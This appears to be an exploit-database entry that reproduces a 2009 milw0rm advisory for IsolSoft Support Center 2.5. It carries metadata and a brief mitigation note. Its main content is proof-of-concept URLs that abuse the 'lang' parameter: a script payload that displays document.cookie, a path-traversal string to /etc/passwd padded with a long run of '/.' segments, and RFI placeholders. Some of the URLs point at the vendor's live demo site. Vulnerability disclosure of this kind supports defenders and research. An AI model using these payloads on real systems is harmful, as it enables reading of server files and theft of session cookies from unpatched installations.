header-logo
Suggest Exploit
vendor:
IsolSoft Support Center
by:
Moudi
8,8
CVSS
HIGH
Remote File Inclusion (RFI), Local File Inclusion (LFI) and Cross-Site Scripting (XSS)
79, 98, 99
CWE
Product Name: IsolSoft Support Center
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: NO
Related CWE: N/A
CPE: a:isolsoft:isolsoft_support_center:2.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

IsolSoft Support Center 2.5 (RFI/LFI/XSS) Multiples Vulnerabilities

IsolSoft Support Center 2.5 is vulnerable to Remote File Inclusion (RFI), Local File Inclusion (LFI) and Cross-Site Scripting (XSS). The vulnerable code is present in the ‘lang’ parameter of the ‘newticket.php’, ‘index.php’ and ‘rempass.php’ files. An attacker can exploit this vulnerability by sending a maliciously crafted URL to the target server. For XSS, the attacker can send a malicious JavaScript code in the ‘lang’ parameter of the ‘newticket.php’ file. For RFI and LFI, the attacker can send a malicious file path in the ‘lang’ parameter of the ‘index.php’, ‘newticket.php’ and ‘rempass.php’ files.

Mitigation:

The application should filter the user input and validate the file path before processing it. The application should also use a whitelist of allowed characters and reject any input that contains characters outside the whitelist.
Source

Exploit-DB raw data:

/*

              _____       _ ___        __          
             | ____|_   _(_) \ \      / /_ _ _   _ 
             |  _| \ \ / / | |\ \ /\ / / _` | | | |
             | |___ \ V /| | | \ V  V / (_| | |_| |
             |_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
                                              |___/ 
                                    _____                    
                                   |_   _|__  __ _ _ __ ___  
                                      | |/ _ \/ _` | '_ ` _ \ 
                                      | |  __/ (_| | | | | | |
                                      |_|\___|\__,_|_| |_| |_|

IsolSoft Support Center 2.5 (RFI/LFI/XSS) Multiples Vulnerabilities

Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://www.isolsoft.com/

Greetings : Mizoz, Zuka, str0ke, 599eme Man.

*/

[+] Exploit XSS:

- Vulnerable code in newticket (lang).

- Poc:
  http://127.0.0.1/newticket.php?lang=[XSS]
  http://www.isolsoft.com/demo/newticket.php?lang="><script>alert(document.cookie);</script>

[+] Exploit LFI:

- Vulnerable code in index.php (lang).
- Vulnerable code in newticket.php (lang).
- Vulnerable code in rempass.php (lang).

- Poc:
  http://127.0.0.1/index.php?adduser=true&lang=[LFI]
  http://127.0.0.1/newticket.php?lang=[LFI]
  http://127.0.0.1/rempass.php?lang=[LFI]
  http://www.isolsoft.com/demo/index.php?adduser=true&lang=[LFI]
  http://www.isolsoft.com/demo/newticket.php?lang=[LFI]
  http://www.isolsoft.com/demo/rempass.php?lang=[LFI]

LFI => ../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..

[+] Exploit RFI:

- Vulnerable code in index.php (lang).
- Vulnerable code in newticket.php (lang).
- Vulnerable code in rempass.php (lang).

- Poc:
  http://127.0.0.1/index.php?adduser=true&lang=[RFI]
  http://127.0.0.1/newticket.php?lang=[RFI]
  http://127.0.0.1/rempass.php?lang=[RFI]

# milw0rm.com [2009-08-07]